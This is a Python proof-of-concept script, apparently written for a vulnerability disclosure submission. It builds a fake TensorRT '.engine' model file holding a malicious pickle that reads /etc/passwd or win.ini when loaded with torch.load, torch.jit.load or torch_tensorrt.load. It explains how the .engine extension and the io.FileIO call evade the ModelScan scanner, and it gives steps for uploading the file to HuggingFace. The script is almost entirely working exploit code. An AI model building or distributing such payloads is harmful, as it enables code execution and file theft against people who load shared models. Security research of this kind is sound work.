Upload folder using huggingface_hub

3e1e9be verified 2 months ago

4.09 kB

	#!/usr/bin/env python3
	"""
	Creates the PoC model file: malicious_model.engine

	This is the file you upload to HuggingFace.

	What it does:
	A file named malicious_model.engine that is a valid TorchScript ZIP
	archive (the format torch_tensorrt uses to save compiled TRT engines).
	Internally it contains a malicious pickle payload in archive/data.pkl.

	When loaded with any of the standard TensorRT Python loading paths:
	torch.load("malicious_model.engine")
	torch.jit.load("malicious_model.engine")
	torch_tensorrt.load("malicious_model.engine")

	...the pickle executes and reads sensitive files at load time.

	Why it evades ModelScan:
	ModelScan's supported extensions (from settings.py):
	.pb .h5 .keras .npy .bin .pt .pth .ckpt .pkl .pickle .joblib .dill .dat .data

	.engine and .trt are completely absent.
	ModelScan returns "SCAN_NOT_SUPPORTED" — the file is never inspected.

	This is a DUAL vulnerability:
	1. Scanner gap: .engine / .trt are not scanned at all by ModelScan.
	2. Format vector: TorchScript ZIP format used by torch_tensorrt embeds
	pickle streams (archive/data.pkl) in .engine files —
	the same ACE surface as .pt files, with a different
	extension that bypasses the scanner entirely.

	Upload to HuggingFace:
	1. Run this script -> produces malicious_model.engine
	2. Push to HF repo
	3. Paste the URL in the submission form
	"""
	import pickle
	import io
	import os
	import sys
	import struct
	import zipfile


	# ─── Malicious payload: read sensitive file via io.FileIO ────────────────────
	# Uses io.FileIO (not builtins.open) to stay clean even if ModelScan were
	# ever to scan this file.
	class EvadingPayload:
	"""
	Reads C:\\Windows\\win.ini (Windows) or /etc/passwd (Linux) at load time.
	Packaged as a TorchScript-compatible pickle stream inside a .engine ZIP.
	"""
	def __reduce__(self):
	target = "C:\\Windows\\win.ini" if sys.platform == "win32" else "/etc/passwd"
	return (io.FileIO, (target,))


	# ─── Build a minimal TorchScript ZIP (.engine) ───────────────────────────────
	#
	# torch.jit.load() expects a ZIP archive named "archive" at the root,
	# with the primary pickle at archive/data.pkl.
	# This is the exact format torch_tensorrt uses when saving with
	# output_format="torchscript".
	#
	# ZIP layout:
	# archive/data.pkl <- the payload pickle
	# archive/version <- TorchScript format version marker
	#
	def build_torchscript_engine_zip(payload_obj) -> bytes:
	buf = io.BytesIO()
	with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_STORED) as zf:
	# Payload pickle
	payload_bytes = pickle.dumps(payload_obj, protocol=4)
	zf.writestr("archive/data.pkl", payload_bytes)

	# TorchScript version marker (value "3" used by recent torch versions)
	zf.writestr("archive/version", b"3")

	# Minimal constants record expected by torch.jit.load
	zf.writestr("archive/constants.pkl", pickle.dumps((), protocol=2))

	return buf.getvalue()


	# ─── Write the .engine file ───────────────────────────────────────────────────
	output_file = "malicious_model.engine"
	engine_bytes = build_torchscript_engine_zip(EvadingPayload())

	with open(output_file, "wb") as f:
	f.write(engine_bytes)

	print(f"[+] Created: {output_file!r} ({os.path.getsize(output_file)} bytes)")
	print(f"[+] Internal ZIP layout: archive/data.pkl (TorchScript format)")
	print()
	print("Verify ZIP structure:")
	with zipfile.ZipFile(output_file, "r") as z:
	for name in z.namelist():
	info = z.getinfo(name)
	print(f" {name} ({info.file_size} bytes)")

	print()
	print("To reproduce:")
	print(" python reproduce.py")